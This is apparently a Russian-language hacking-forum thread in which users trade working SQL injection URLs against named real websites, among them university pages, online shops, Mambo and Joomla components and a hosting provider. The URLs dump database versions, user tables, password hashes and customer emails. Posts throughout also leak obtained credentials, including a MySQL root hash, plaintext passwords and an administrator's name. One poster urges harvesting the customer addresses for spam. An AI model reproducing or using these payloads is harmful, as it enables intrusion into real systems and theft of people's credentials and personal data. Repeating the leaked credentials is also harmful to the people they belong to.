не ето не самописный точно если в гугле вбить inurl:"attorneys_bio.php" то он выдаст линков 20 и почти у всех будет скуля
Code: http://www.ufo.com.br/bonus.php?id=-8+union+select+1,2,version()+admin/* Code: http://www.menestrersgascons.com/francais/groupesmusicaux/bonus.php?id=-5+union+select+1,2,VERSION(),4,5,6,7,8,9/* Code: http://www.kujtesa.com/bs.php?id=-33+union+select+1,2,VERSION(),4,5,6,7,8,9,10,11,12,13,14/*
Mambo component Portfolio Manager 1.0 Code: http://www.inta.org/index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/* (c) it's my
вот парочка ЕДУшек с ПР=6 =) _http://experts.uchicago.edu/experts.php?id=99999+union+select+1,2,3,4,VERSION(),6,USER(),DATABASE(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/* вручную подбирал =) _http://wandp.american.edu/pages.php?ID=99999+union+select+1,2,3,4/* тут чет непонятное...
http://www.thedietplate.us/products.php?cat=-99991%2527%2520+union+select+version()/* 4.1.22-standard
еще один: _http://lapa.princeton.edu/peopledetail.php?ID=99999+union+select+1,2,3,4,VERSION(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/*
во, уже пятая версия мускула : _http://www.geology.ohio-state.edu/faculty_bios.php?id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*
2 x88x почему не понятно всё нормально _http://wandp.american.edu/pages.php?ID=-5+union+select+1,aes_decrypt(aes_encrypt(user,0x71),0x71),aes_decrypt(aes_encrypt(password,0x71),0x71),4+from+mysql.user/* root *ADDF07FCC8E37371B887F38314C77A2FA4BC71CE
Обход фильтрации - HTML: http://wandp.american.edu/pages.php?ID=99999+union+select+1,2,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+using+latin1),4/*
PR-6. http://www.ochenk.com/entry.php?id=-63+union+select+1,concat_ws(0x3A3a,version(),database(),user()),3,4/*
Ничего больше сделать не пробывал, ибо лень)) Там уж сами... кому надо, тот сделает)) Просто нашел скулю и решил выложить)) Удачи... http://www.warcraftrealms.com/census.php?serverid=-298+union+select+table_name,2+from+information_schema.tables/* http://www.warcraftrealms.com/census.php?serverid=-298+union+select+column_name,2+from+information_schema.columns/*
brassmedia.com Code: http://www.brassmedia.com/press/?id=-1+union+select+1,2,3,concat_ws(0x3,version(),user(),database()),5,6,7,8,9,10,11,12,13/* 5.0.22[email protected]brass_media Code: http://www.brassmedia.com/press/?id=-1+union+select+1,2,3,concat_ws(0x3,user_id,first_name,last_name,password),5,6,7,8,9,10,11,12,13+from+brass_magazine.brasscu_user_accounts/* [email protected]frederickbrozyna jrhardrunner http://brassmedia.serveftp.net/index.asp
4.1.9 ----------------------------------------------------- 5.0.24a-standard-log ----------------------------------------------------- 4.0.18-log логин не нашёл пасс:s0o2r3z ----------------------------------------------------- 4.1.12-STANDARD ----------------------------------------------------- 4.0.27-standard-log
Code: http://sify.com/astrology/fullstory.php?id=-14166076+union+select+0,7,3,concat(userid,0x3,password),5,6,7,8,9,0,0,2,3,4,5,6,7,8+from+users/* akbar_babars0o2r3z моть быть этот
Хыы я для спамера просто золотая жила свежих мыльников вот вам собираем карочь базы огромные просто (не везде конечно но много в основном) HTML: http://www.amenbeads.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/* HTML: http://www.wallables.com/catalog/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/* HTML: http://kissedbyangels.com/oscommerce/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/* HTML: http://www.chibabogu.com/catalog/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/* HTML: http://www.dvbhardware.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/* HTML: http://www.diggorypress.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/* HTML: http://www.foreverpets.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/* HTML: http://www.energysavingworld.co.uk/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/* парсим пока тепленькие а то не успеите, остынут
Mambo Component Material Suche 1.0 Code: http://www.berufsvorbereitung-medien.org/index.php?option=com_materialsuche&Itemid=70&tsk=detail&id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),null,null,7,null,9,null,null,null,null,14,null,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/* Сайтов с данной багой больше не нашел =/
вообшем скуль Code: http://www.newspress.fr/index.asp?lang='+or+1 db_name: newspress sys_user :newspress_user version:Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) имена таблиц : Code: 'ACCESPRESSE','addr','ADFP_CAT_IDS','ADFP_QUA_IDS', 'Adresse_Web','ALERT_COMM','algorithm','APPNAME','ARCHIVEDON','ARGUS_CAT_IDS','ARGUS_TEM_IDS','auid','backuplsn','BEGINDATE','bin_data','binary_message_body','bit_data','bitlength','bitposint','bitposleaf','brkrinst','CARNET','CARTE_ID','CAT_ID','CAT_IDS','Categorie_Titre','CATID','CCLIC','CDAYS','CDISP','cert','Chaine','chk','USERS' берем таблицу и подбираем имена столбцов (пример для таблицы лог): Code: http://www.newspress.fr/index.asp?lang='+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME='LOG'+AND+C OLU MN_NAME+NOT+IN+('addr','xxx',))-- найдя нужный столбец например addr выводим Code: http://www.newspress.fr/index.asp?lang='+or+1=(SELECT+TOP+1+addr+from+LOG)-- в поиске и использовании очень помогла статья [cash] http://forum.antichat.ru/threadnav30501-1-10.html
Joomla Component Artist Code: http://www.tremplin-avenir.com/index.php?option=com_artist&task=view_artist_file&artistId=-1+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16+from+jos_users/* http://www.dymok.net/index.php?option=com_artist&task=show_artist&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16+from+jos_users/* http://www.aarte.net/index.php?option=com_artist&idgalery=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9+from+jos_users/* Три разных уязвимых параметра Добавлено: Code: http://www.hanoiguesthouse.net/index.php?option=com_list&city=-1+union+select+1,2,3,concat(version()),5,6,7,8,9,10/*
хостерЖ elabhosting.com Code: http://www.elabhosting.com/subtopic.php?id=99999'+union+select+1,AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71),3,4+from+users+limit+1,1/* Таблицы и поля, которые я подобрал: HTML: users email password first_name last_name domains server id name А вот и адимн: First Name: Wael Last Name: Elkadi pass: william [email protected]